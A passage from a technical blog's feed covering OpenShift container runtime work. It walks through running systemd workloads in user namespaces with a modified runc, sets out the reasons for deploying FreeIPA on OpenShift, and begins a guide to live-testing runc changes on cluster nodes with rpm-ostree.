<span id="cb6-16"><a href="#cb6-16" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">files</span><span class="kw">:</span></span>
<span id="cb6-17"><a href="#cb6-17" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/crio/crio.conf.d/99-crio-userns.conf</span></span>
<span id="cb6-18"><a href="#cb6-18" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb6-19"><a href="#cb6-19" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb6-20"><a href="#cb6-20" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,W2NyaW8ucnVudGltZS5ydW50aW1lcy5ydW5jXQphbGxvd2VkX2Fubm90YXRpb25zPVsiaW8ua3ViZXJuZXRlcy5jcmktby51c2VybnMtbW9kZSJdCg==</span></span>
<span id="cb6-21"><a href="#cb6-21" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/subuid</span></span>
<span id="cb6-22"><a href="#cb6-22" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb6-23"><a href="#cb6-23" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb6-24"><a href="#cb6-24" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==</span></span>
<span id="cb6-25"><a href="#cb6-25" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/subgid</span></span>
<span id="cb6-26"><a href="#cb6-26" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb6-27"><a href="#cb6-27" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb6-28"><a href="#cb6-28" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==</span></span></code></pre></div>
<p>The file <code>/etc/crio/crio.conf.d/99-crio-userns.conf</code> enables CRI-O’s
annotation-based user namespace support. Its content
(base64-encoded in the <code>MachineConfig</code>) is:</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode ini"><code class="sourceCode ini"><span id="cb7-1"><a href="#cb7-1" aria-hidden="true" tabindex="-1"></a><span class="kw">[crio.runtime.runtimes.runc]</span></span>
<span id="cb7-2"><a href="#cb7-2" aria-hidden="true" tabindex="-1"></a><span class="dt">allowed_annotations</span><span class="ot">=</span><span class="st">[&quot;io.kubernetes.cri-o.userns-mode&quot;]</span></span></code></pre></div>
<p>The <code>MachineConfig</code> also overrides <code>/etc/subuid</code> and <code>/etc/subgid</code>,
defining sub-id ranges for user namespaces. The content is the same
for both files:</p>
<pre><code>core:100000:65536
containers:200000:268435456</code></pre>
<p>Create the <code>MachineConfig</code>:</p>
<pre class="shell"><code>% oc create -f machineconfig-userns-cgv2.yaml
machineconfig.machineconfiguration.openshift.io/userns-cgv2 created</code></pre>
<p>Wait for the Machine Config Operator to apply the changes and reboot
the worker nodes:</p>
<pre class="shell"><code>% oc wait mcp/worker --for condition=updated --timeout=-1s
machineconfigpool.machineconfiguration.openshift.io/worker condition met</code></pre>
<p>It will take several minutes, as worker nodes get rebooted one a time.</p>
<h3 id="create-project-and-user">Create project and user <a href="#create-project-and-user" class="section">§</a></h3>
<p>Create a new project called <code>test</code>:</p>
<pre class="shell"><code>% oc new-project test
Now using project &quot;test&quot; on server &quot;https://api.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com:6443&quot;.

You can add applications to this project with the &#39;new-app&#39; command. For example, try:

    oc new-app ruby~https://github.com/sclorg/ruby-ex.git

to build a new example application in Python. Or use kubectl to deploy a simple Kubernetes application:

    kubectl create deployment hello-node --image=gcr.io/hello-minikube-zero-install/hello-node</code></pre>
<p>The output shows the public domain name of this cluster:
<code>ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com</code>. We need to know
this for creating the route in the next step.</p>
<p>Create a user called <code>test</code>. Grant it <code>admin</code> role on project
<code>test</code>, and the <code>anyuid</code> Security Context Constraint (SCC)
privilege:</p>
<pre class="shell"><code>% oc create user test
user.user.openshift.io/test created
% oc adm policy add-role-to-user admin test
clusterrole.rbac.authorization.k8s.io/admin added: &quot;test&quot;
% oc adm policy add-scc-to-user anyuid test
securitycontextconstraints.security.openshift.io/anyuid added to: [&quot;test&quot;]</code></pre>
<h3 id="create-service-and-route">Create service and route <a href="#create-service-and-route" class="section">§</a></h3>
<p>Create a service to provide HTTP access to pods matching the <code>app: nginx</code> selector:</p>
<div class="sourceCode" id="cb13"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb13-1"><a href="#cb13-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb13-2"><a href="#cb13-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb13-3"><a href="#cb13-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb13-4"><a href="#cb13-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb13-5"><a href="#cb13-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb13-6"><a href="#cb13-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb13-7"><a href="#cb13-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb13-8"><a href="#cb13-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb13-9"><a href="#cb13-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> TCP</span></span>
<span id="cb13-10"><a href="#cb13-10" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">80</span></span></code></pre></div>
<pre class="shell"><code>% oc create -f service-nginx.yaml
service/nginx created</code></pre>
<p>The following route definition will provide HTTP ingress from
outside the cluster:</p>
<div class="sourceCode" id="cb15"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb15-1"><a href="#cb15-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb15-2"><a href="#cb15-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Route</span></span>
<span id="cb15-3"><a href="#cb15-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb15-4"><a href="#cb15-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb15-5"><a href="#cb15-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb15-6"><a href="#cb15-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">host</span><span class="kw">:</span><span class="at"> nginx.apps.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com</span></span>
<span id="cb15-7"><a href="#cb15-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">to</span><span class="kw">:</span></span>
<span id="cb15-8"><a href="#cb15-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb15-9"><a href="#cb15-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nginx</span></span></code></pre></div>
<p>Note the <code>host</code> field. Its value is <code>nginx.apps.$CLUSTER_DOMAIN</code>.
Change it to the proper value for your cluster, then create the
route:</p>
<pre class="shell"><code>% oc create -f route-nginx.yaml
route.route.openshift.io/nginx created</code></pre>
<p>There is no pod to route the traffic to… yet.</p>
<h3 id="create-pod">Create pod <a href="#create-pod" class="section">§</a></h3>
<p>The pod specification is:</p>
<div class="sourceCode" id="cb17"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb17-1"><a href="#cb17-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb17-2"><a href="#cb17-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb17-3"><a href="#cb17-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb17-4"><a href="#cb17-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb17-5"><a href="#cb17-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb17-6"><a href="#cb17-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb17-7"><a href="#cb17-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">annotations</span><span class="kw">:</span></span>
<span id="cb17-8"><a href="#cb17-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.kubernetes.cri-o.userns-mode</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;auto:size=65536&quot;</span></span>
<span id="cb17-9"><a href="#cb17-9" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb17-10"><a href="#cb17-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">securityContext</span><span class="kw">:</span></span>
<span id="cb17-11"><a href="#cb17-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">sysctls</span><span class="kw">:</span></span>
<span id="cb17-12"><a href="#cb17-12" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;net.ipv4.ping_group_range&quot;</span></span>
<span id="cb17-13"><a href="#cb17-13" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">value</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;0 65535&quot;</span></span>
<span id="cb17-14"><a href="#cb17-14" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb17-15"><a href="#cb17-15" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb17-16"><a href="#cb17-16" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> quay.io/ftweedal/test-nginx:latest</span></span>
<span id="cb17-17"><a href="#cb17-17" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">tty</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span></code></pre></div>
<p>Create the pod:</p>
<pre class="shell"><code>% oc --as test create -f pod-nginx.yaml
pod/nginx created</code></pre>
<p>After a few seconds, the pod is running:</p>
<pre class="shell"><code>% oc get -o json pod/nginx | jq .status.phase
&quot;Running&quot;</code></pre>
<p>Tail the pod’s log. Observe the final lines of systemd boot output
and the login prompt:</p>
<pre class="shell"><code>% oc logs --tail 10 pod/nginx
[  OK  ] Started The nginx HTTP and reverse proxy server.
[  OK  ] Reached target Multi-User System.
[  OK  ] Reached target Graphical Interface.
         Starting Update UTMP about System Runlevel Changes...
[  OK  ] Finished Update UTMP about System Runlevel Changes.

Fedora 33 (Container Image)
Kernel 4.18.0-305.3.1.el8_4.x86_64 on an x86_64 (console)

nginx login: %</code></pre>
<div class="note">
<p>Without <code>tty: true</code> in the <code>Container</code> spec, the pod won’t produce
any output and <code>oc logs</code> won’t have anything to show.</p>
</div>
<p>The log tail also shows that systemd started the <code>nginx</code> service.
We already set up a <code>route</code> in the previous step. Use <code>curl</code> to
issue an HTTP request and verify that the service is running
properly:</p>
<pre class="shell"><code>% curl --head \
    nginx.apps.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 21 Jul 2021 06:55:38 GMT
Content-Type: text/html
Content-Length: 5564
Last-Modified: Mon, 27 Jul 2020 22:20:49 GMT
ETag: &quot;5f1f5341-15bc&quot;
Accept-Ranges: bytes
Set-Cookie: 6cf5f3bc2fa4d24f45018c591d3617c3=f114e839b2eef9cdbe00856f18a06336; path=/; HttpOnly
Cache-control: private</code></pre>
<h3 id="verify-sandbox">Verify sandbox <a href="#verify-sandbox" class="section">§</a></h3>
<p>Now let’s verify that the container is indeed running in a user
namespace. Container UIDs must map to unprivileged UIDs on the
host. Query the worker node on which the pod is running, and its
CRI-O container ID:</p>
<pre class="shell"><code>% oc get -o json pod/nginx | jq \
    &#39;.spec.nodeName, .status.containerStatuses[0].containerID&#39;
&quot;ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w&quot;
&quot;cri-o://bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0&quot;</code></pre>
<p>Start a debug shell on the node and query the PID of the container
init process:</p>
<pre class="shell"><code>% oc debug node/ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w
Starting pod/ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.32.4
If you don&#39;t see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# crictl inspect bf2b3d | jq .info.pid
7759</code></pre>
<p>Query the UID map and process tree of the container:</p>
<pre class="shell"><code>sh-4.4# cat /proc/7759/uid_map
         0     200000      65536
sh-4.4# pgrep --ns 7759 | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
200000      7759 /sbin/init
200000      7796 /usr/lib/systemd/systemd-journald
200193      7803 /usr/lib/systemd/systemd-resolved
200000      7806 /usr/lib/systemd/systemd-homed
200000      7807 /usr/lib/systemd/systemd-logind
200081      7809 /usr/bin/dbus-broker-launch --scope system --audit
200000      7812 /sbin/agetty -o -p -- \u --noclear --keep-baud console 115200,38400,9600 xterm
200081      7813 dbus-broker --log 4 --controller 9 --machine-id 2f2fcc4033c5428996568ca34219c72a --max-bytes 5
200000      7815 nginx: master process /usr/sbin/nginx
200999      7816 nginx: worker process
200999      7817 nginx: worker process
200999      7818 nginx: worker process
200999      7819 nginx: worker process</code></pre>
<p>This confirms that the container has a user namespace. The
container’s UID range is <code>0</code>–<code>65535</code>, which maps to the host UID
range <code>200000</code>–<code>265535</code>. The <code>ps</code> output shows various services
running under systemd, running under unprivileged host UIDs in this
range.</p>
<p>So, everything is running as expected. One last thing: let’s look
at the cgroup ownership. Query the container’s <code>cgroupsPath</code>:</p>
<pre class="shell"><code>sh-4.4# crictl inspect bf2b3d | jq .info.runtimeSpec.linux.cgroupsPath
&quot;kubepods-besteffort-podc7f11ee7_e178_4dea_9d8c_c005ad648988.slice:crio:bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0&quot;</code></pre>
<p>The value isn’t a filesystem path. <code>runc</code> interprets it relative to
an implementation-defined location. We expect the cgroup directory
and the three files mentioned earlier to be owned by the user that
maps to UID <code>0</code> in the container’s user namespace. In my case,
that’s <code>200000</code>. We also expect to see scopes and slices created by
systemd <strong>in the container</strong> to be owned by the same user.</p>
<pre class="shell"><code>sh-4.4# ls -ali /sys/fs/cgroup\
/kubepods.slice/kubepods-besteffort.slice\
/kubepods-besteffort-podc7f11ee7_e178_4dea_9d8c_c005ad648988.slice\
/crio-bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0.scope \
    | grep 200000
14755 drwxr-xr-x.  5 200000 root   0 Jul 21 06:00 .
14757 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.procs
14760 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.subtree_control
14758 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.threads
14806 drwxr-xr-x.  2 200000 200000 0 Jul 21 06:00 init.scope
14835 drwxr-xr-x. 11 200000 200000 0 Jul 21 06:15 system.slice
14922 drwxr-xr-x.  2 200000 200000 0 Jul 21 06:00 user.slice</code></pre>
<p>Note the <em>inode</em> of the container cgroup directory: <code>14755</code>. We can query the
inode and ownership of <code>/sys/fs/cgroup</code> <em>within the pod</em>:</p>
<pre class="shell"><code>% oc exec pod/nginx -- ls -ldi /sys/fs/cgroup
14755 drwxr-xr-x. 5 root nobody 0 Jul 21 06:00 /sys/fs/cgroup</code></pre>
<p>The inode is the same; this is indeed the same cgroup. But within the
container’s user namespace, the owner appears as <code>root</code>.</p>
<p>This concludes the verification steps. With my modified version of
<code>runc</code>, systemd-based workloads are indeed working properly in user
namespaces.</p>
<h2 id="next-steps">Next steps <a href="#next-steps" class="section">§</a></h2>
<p>I submitted a <a href="https://github.com/opencontainers/runc/pull/3057">pull request</a> with these changes. It remains to be
seen if the general approach will be accepted, but initial feedback
is positive. Some implementation changes are needed. I might have
to hide the behaviour behind a feature gate (e.g. to be activated
via an annotation). I also need to write tests and documentation.</p>
<p>I also need to raise a ticket for the SCC issue. The requirement
for <code>RunAsAny</code> (which is granted by the <code>anyuid</code> SCC) should be
relaxed when the sandbox has a user namespace. The SCC enforcement
machinery needs to be enhanced to understand user namespaces, so
that unprivileged OpenShift user accounts can run workloads in them.</p>
<p>It would be nice to find a way to avoid the sysctl override to allow
the container user to use <code>ping</code>. This is a much lower priority.</p>
<p>Alongside these matters, I can begin testing the FreeIPA container
in the test environment. Although systemd is now working, I need to
see if the FreeIPA’s constituent services will run properly. I
anticipate that I will need to tweak the Pod configuration somewhat.
But are there more runtime capability gaps waiting to be discovered?
I don’t have a particular suspicion about it, but I do need to know
for certain, one way or the other. So expect another blog post
soon!</p>]]></summary>
</entry>
<entry>
    <title>FreeIPA on OpenShift: July 2021 update</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2021-07-21-freeipa-on-openshift-update.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2021-07-21-freeipa-on-openshift-update.html</id>
    <published>2021-07-21T00:00:00Z</published>
    <updated>2021-07-21T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="freeipa-on-openshift-july-2021-update">FreeIPA on OpenShift: July 2021 update</h1>
<p>Over the last year I’ve done a lot of investigations into OpenShift,
and container runtimes more generally. The driver of this work is
the FreeIPA on OpenShift project (known within Red Hat as IDMOCP).
I published the results of my investigations in numerous blog posts,
but I have not yet written much about <em>why</em> we are doing this at
all.</p>
<p>So it’s time to fix that. In this short post I discuss why we want
FreeIPA on OpenShift, and the major decision that put us on our
current implementation path.</p>
<p>FreeIPA is a centralised identity management system for the
enterprise. You enrol users, hosts and services, and configure
access policies and other security mechanisms. The system provides
authentication and policy enforcement mechanisms. It is similar to
Microsoft Active Directory (and indeed can integrate with AD).
FreeIPA is a complex system with lots of components including:</p>
<ul>
<li>LDAP server (389 DS / RHDS)</li>
<li>Kerberos KDC (MIT Kerberos)</li>
<li>Certificate authority (Dogtag / RHCS)</li>
<li>HTTP API (Apache httpd and a lot of Python code)</li>
<li>Host client daemon (SSSD)</li>
<li>several smaller supporting services</li>
<li>installation and administration tools</li>
</ul>
<p>FreeIPA is available on Fedora and RHEL. You install the RPMs and
the installation program configures the system. It is intended to
be deployed on a dedicated machine (VM or bare metal).</p>
<p>We are motivated to support FreeIPA on OpenShift for several
reasons, including:</p>
<ul>
<li><p>Easily providing identity services to applications running on
OpenShift.</p></li>
<li><p>Leveraging OpenShift and Kubernetes orchestration, scalaing and
management features to improve robustness and reduce management
overhead of FreeIPA deployments.</p></li>
<li><p>Offering FreeIPA, hosted on OpenShift, as a managed service.</p></li>
</ul>
<p>Understandably, moving such an application to OpenShift is a
non-trivial task. At the beginning of this effort, we had to decide
the main implementation approach. There were three options:</p>
<ol type="1">
<li><p>Put the whole system in a single “monolithic container”, with
systemd as the init process. At the time (and still today)
OpenShift only supports running systemd workloads in privileged
containers, which is not acceptable. The runtime needs to evolve
to support this use case. Work on <em>some</em> of the missing features
(such as user namespaces and cgroups v2) was already underway.</p></li>
<li><p>Deploy different parts of the FreeIPA system in different
containers, running unprivileged. This is a fundamental shift
from the current architecture and a huge up-front engineering
effort. Also, the current architecture has to be maintained and
supported for a long time (&gt;10 years). So this approach brings
a substantial ongoing cost in maintaining two architectures of
the same application. On a technical level, this approach is
feasible today.</p></li>
<li><p>Use a VM-based workload (Kata / OpenShift Sandboxed Containers).
This option probably has the lowest up-front and ongoing
engineering costs. But it requires a bare metal cluster or
nested virtualisation, which is not available from most cloud
providers. By extension, <a href="https://www.openshift.com/products/dedicated/">OpenShift Dedicated (OSD)</a> also
does not supported it. Red Hat managed services run on OSD.
Offering a managed service is one of the motivators of our
effort. So at this time, VM-based workloads are not an option
for us.</p></li>
</ol>
<p>As a small team, and considering the business reality of the
existing offering as part of RHEL, we decided to pursue the
“monolithic container” approach. We are depending on the OpenShift
runtime evolving to a point where it can support fully isolated
systemd-based workloads. And that is why I have invested much of
the last 12 months in understanding container runtimes and pushing
their limits.</p>
<p>Our approach is not “cloud native” and indeed many people have
expressed alarm or confusion when we tell them what we are doing.
Certainly, if we were designing FreeIPA from the ground up in
today’s world, it would look very different from the current
architecture. But this is the reality: if you want customers to
bring their mature, complex applications onto OpenShift, don’t
expect them to spend big money and assume big risk to rearchitect
the application to fit the new environment.</p>
<p>What customers actually need is to be able to bring the application
across more or less as-is. Then they can realise the benefits
(automation, monitoring, scaling, etc) <em>incrementally</em>, with lower
up-front costs and less risk.</p>
<p>If my claims are correct, then proper systemd workload support in
OpenShift will be a Very Big Deal. But even if I’m wrong, it is
still critical for our FreeIPA on OpenShift effort. And it is
achievable. In my next post I’ll demonstrate my working proof of
concept for user-namespaced systemd workloads on OpenShift.</p>]]></summary>
</entry>
<entry>
    <title>Live-testing changes in OpenShift clusters</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2021-06-29-openshift-live-changes.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2021-06-29-openshift-live-changes.html</id>
    <published>2021-06-29T00:00:00Z</published>
    <updated>2021-06-29T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="live-testing-changes-in-openshift-clusters">Live-testing changes in OpenShift clusters</h1>
<p>I have been hacking on the <a href="https://github.com/opencontainers/runc"><code>runc</code></a> container runtime. So how
do I test my changes in an OpenShift cluster?</p>
<p>One option is to compose a <code>machine-os-content</code> release via
<a href="https://github.com/coreos/coreos-assembler"><em>coreos-assembler</em></a>.
Then you can deploy or upgrade a cluster with that release. Indeed,
this approach is <em>necessary</em> for testing installation and upgrades.
It also seems useful for publishing modified versions for other
people to test. But it is a heavyweight and time consuming option.</p>
<p>For development I want a more lightweight approach. In this post
I’ll demonstrate how to use the <code>rpm-ostree usroverlay</code> and
<code>rpm-ostree override replace</code> commands to test changes in a live
OpenShift cluster.</p>
<h2 id="background">Background <a href="#background" class="section">§</a></h2>
<p>OpenShift runs on CoreOS. CoreOS uses <a href="https://en.wikipedia.org/wiki/OSTree"><em>OSTree</em></a> to manage
the filesystem. Most of the filesystem is immutable. When
upgrading, a new filesystem is prepared before rebooting the system.
The old filesystem is preserved, so it is easy to roll back.</p>
<p>So I can’t just log onto an OpenShift node and replace
<code>/usr/bin/runc</code> with my modified version. Nevertheless, I have seen
<a href="https://github.com/openshift/machine-config-operator/blob/master/docs/HACKING.md#directly-applying-changes-live-to-a-node">references</a> to the <code>rpm-ostree usroverlay</code> command. It is
supposed to provide a writable overlayfs on <code>/usr</code>, so that you can
test modifications. Changes are lost upon reboot, but that’s fine
for testing.</p>
<p>There’s also the <code>rpm-ostree override replace …</code> command. This
command works on the level of RPM packages. It allows you to
install new packages or replace or remove packages. Changes persist
across reboots, but it is easy to roll back to the <em>pristine</em> state
of the current CoreOS release.</p>
<p>The rest of this article explores how to use these two commands to
apply changes to the cluster.</p>
<h2 id="usroverlay-via-debug-container-doesnt-work"><code>usroverlay</code> via debug container (doesn’t work) <a href="#usroverlay-via-debug-container-doesnt-work" class="section">§</a></h2>
<p>I first attempted to use <code>rpm-ostree usroverlay</code> in a node debug
pod.</p>
<pre class="shell"><code>% oc debug node/worker-a
Starting pod/worker-a-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don&#39;t see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm-ostree usroverlay
Development mode enabled.  A writable overlayfs is now mounted on /usr.
All changes there will be discarded on reboot.
sh-4.4# touch /usr/bin/foo
touch: cannot touch &#39;/usr/bin/foo&#39;: Read-only file system</code></pre>
<p>The <code>rpm-ostree usroverlay</code> command succeeded. But <code>/usr</code> remained
read-only. The debug container has its own mount namespace, which
was unaffected. I guess that I need to log into the node directly
to use the writable <code>/usr</code> overlay. Perhaps it is also necessary to
execute <code>rpm-ostree usroverlay</code> as an unconfined user (in the
SELinux sense). I <strong>restarted the node</strong> to begin afresh:</p>
<pre class="shell"><code>sh-4.4# reboot

Removing debug pod ...</code></pre>
<h2 id="usroverlay-via-ssh"><code>usroverlay</code> via SSH <a href="#usroverlay-via-ssh" class="section">§</a></h2>
<p>For the next attempt, I logged into the worker node over SSH. The
first step was to add the SSH public key to the <code>core</code> user’s
<code>authorized_keys</code> file. Roberto Carratalá’s <a href="https://rcarrata.com/openshift/update-workers-ssh/">helpful blog post</a>
explains how to do this. I will recap the critical bits.</p>
<p>SSH keys can be added via <code>MachineConfig</code> objects, which must also
specify the machine role (e.g. <code>worker</code>). The Machine Config
Operator will only add keys to the <code>core</code> user. Multiple keys can
be specified, across multiple <code>MachineConfig</code> objects—all the keys
in matching objects will be included.</p>
<div class="note">
<p>I don’t have direct network access to the worker node. So how could
I log in over SSH? I generated a key <strong><em>in the node debug shell</em></strong>,
and will log in from there!</p>
<pre class="shell"><code>sh-4.4# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory &#39;/root/.ssh&#39;.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:jAmv…NMnY root@worker-a
sh-4.4# cat ~/.ssh/id_rsa.pub
ssh-rsa AAAA…4OU= root@worker-a</code></pre>
</div>
<p>The following <code>MachineConfig</code> adds the SSH key for user <code>core</code>:</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> machineconfiguration.openshift.io/v1</span></span>
<span id="cb4-2"><a href="#cb4-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> MachineConfig</span></span>
<span id="cb4-3"><a href="#cb4-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb4-4"><a href="#cb4-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> ssh-authorized-keys-worker</span></span>
<span id="cb4-5"><a href="#cb4-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb4-6"><a href="#cb4-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">machineconfiguration.openshift.io/role</span><span class="kw">:</span><span class="at"> worker</span></span>
<span id="cb4-7"><a href="#cb4-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb4-8"><a href="#cb4-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">config</span><span class="kw">:</span></span>
<span id="cb4-9"><a href="#cb4-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">ignition</span><span class="kw">:</span></span>
<span id="cb4-10"><a href="#cb4-10" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">version</span><span class="kw">:</span><span class="at"> </span><span class="fl">3.2.0</span></span>
